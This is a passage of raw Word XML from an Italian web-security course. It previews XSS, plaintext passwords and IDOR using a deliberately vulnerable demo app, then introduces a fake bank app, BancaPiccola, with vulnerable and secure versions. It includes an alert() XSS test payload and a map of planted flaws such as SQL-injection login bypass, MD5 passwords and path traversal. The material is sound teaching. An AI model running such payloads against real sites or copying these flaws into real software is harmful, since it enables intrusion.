        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il meccanismo della </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec_3_6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">sezione 3.6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="137"/>
    <w:bookmarkStart w:id="138" w:name="Xbcfe3143a1ca0d4a53ad147ead067715637831a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una piccola dimostrazione delle vulnerabilità che vedremo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Senza ancora studiare a fondo nessun attacco, fai questi esperimenti veloci:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1060"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vai su</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">/login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">. Nel campo username scrivi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert('Ciao')&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">e clicca</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Accedi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">con una password qualsiasi.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">La pagina ti dirà</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Credenziali errate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Ma adesso vai sulla home con un account valido, e leggi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">con calma</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il messaggio di errore. Niente di drammatico questa volta perché la pagina di errore è statica, ma intuirai dove sta andando la cosa: nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 8</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> vedremo che inserire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in posti che vengono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">stampati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">indietro è il cuore di XSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1060"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Loggato come</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">mario</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">, pubblica un messaggio. Adesso nel terminale, mentre l’app gira, apri DB Browser for SQLite, apri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">miniblog.db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">, vai sulla tabella</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">utenti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">. Cosa vedi?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">La password di Mario è scritta letteralmente come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Se qualcuno copia questo file, ha tutte le password in chiaro.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 7</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> vedremo perché le password vanno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">hashate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, mai memorizzate in chiaro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1060"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Loggato come</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">mario</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">, prova a navigare manualmente a un endpoint inesistente, per esempio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">/utente/42</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">. Cosa vedi?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Un errore 404: la route non esiste. Ma se domani aggiungessi una pagina</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/utente/&lt;id&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per vedere il profilo, e lasciassi che qualunque utente loggato veda il profilo di chiunque, avrei creato un IDOR. Lo vedremo nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questi tre piccoli esperimenti sono il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">preview</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dei prossimi capitoli. Riprenderemo MiniBlog (o un’app analoga) per vedere ciascuna vulnerabilità all’opera.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="138"/>
    <w:bookmarkEnd w:id="139"/>
    <w:bookmarkStart w:id="144" w:name="bancapiccola-lapplicazione-del-corso"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="482" w:name="sec_3_15"/>
      <w:r>
        <w:t xml:space="preserve">3.15 BancaPiccola: l’applicazione del corso</w:t>
      </w:r>
      <w:bookmarkEnd w:id="482"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A partire dal </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, gli esercizi useranno un’applicazione più ricca chiamata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. È pubblicata sul repository del corso:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:hyperlink r:id="rId39">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/ss4i/BancaPiccola</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ℹ️ Il codice di BancaPiccola viene rilasciato e aggiornato man mano che procediamo nei capitoli. Per ora la struttura è solo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">descrittiva</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: non eseguire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">finché non te lo indica esplicitamente il </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="140" w:name="cosa-è-bancapiccola"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cosa è BancaPiccola</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">È una finta banca online minimalista, scritta in Python/Flask + SQLite. Esistono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">due versioni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dell’app:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1061"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola-vuln/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— La versione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerabile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Contiene tutti i bug di sicurezza dei capitoli 5-10. È quella su cui lancerai gli attacchi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1061"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola-secure/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— La versione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">corretta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Stessa funzionalità, ma con tutte le difese applicate. È il tuo punto di arrivo.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="140"/>
    <w:bookmarkStart w:id="141" w:name="funzionalità-principali"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Funzionalità principali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1062"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Registrazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">utenti</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1062"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dashboard</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con saldo e movimenti del conto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1062"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Lista delle fatture</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dell’utente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1062"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dettaglio di una singola fattura</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(con allegato PDF scaricabile)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1062"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Modifica del profilo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(nome, email, password)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1062"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Bonifici</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">verso altri conti</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1062"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Pannello amministratore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(per utenti con ruolo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="141"/>
    <w:bookmarkStart w:id="142" w:name="tabelle-principali-del-database"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tabelle principali del database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Tabella</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cosa contiene</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">utenti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Anagrafica e credenziali (vulnerabile: password in MD5; sicura: bcrypt)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">conti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Saldo, IBAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">fatture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Importo, data, descrizione, riferimento al conto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">movimenti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Storico operazioni</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allegati</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Riferimenti a file PDF (campo di prova per Path Traversal)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sessioni</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Stato delle sessioni utente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="142"/>
    <w:bookmarkStart w:id="143" w:name="quale-vulnerabilità-in-quale-endpoint"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quale vulnerabilità in quale endpoint</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Solo come anteprima, ecco una mappa di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dove cercare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mentre lavorerai sui capitoli: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Vulnerabilità nascosta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Capitolo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SQL Injection (login bypass)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:hyperlink w:anchor="ch_5" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="0563C1"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">Cap. 5</w:t>
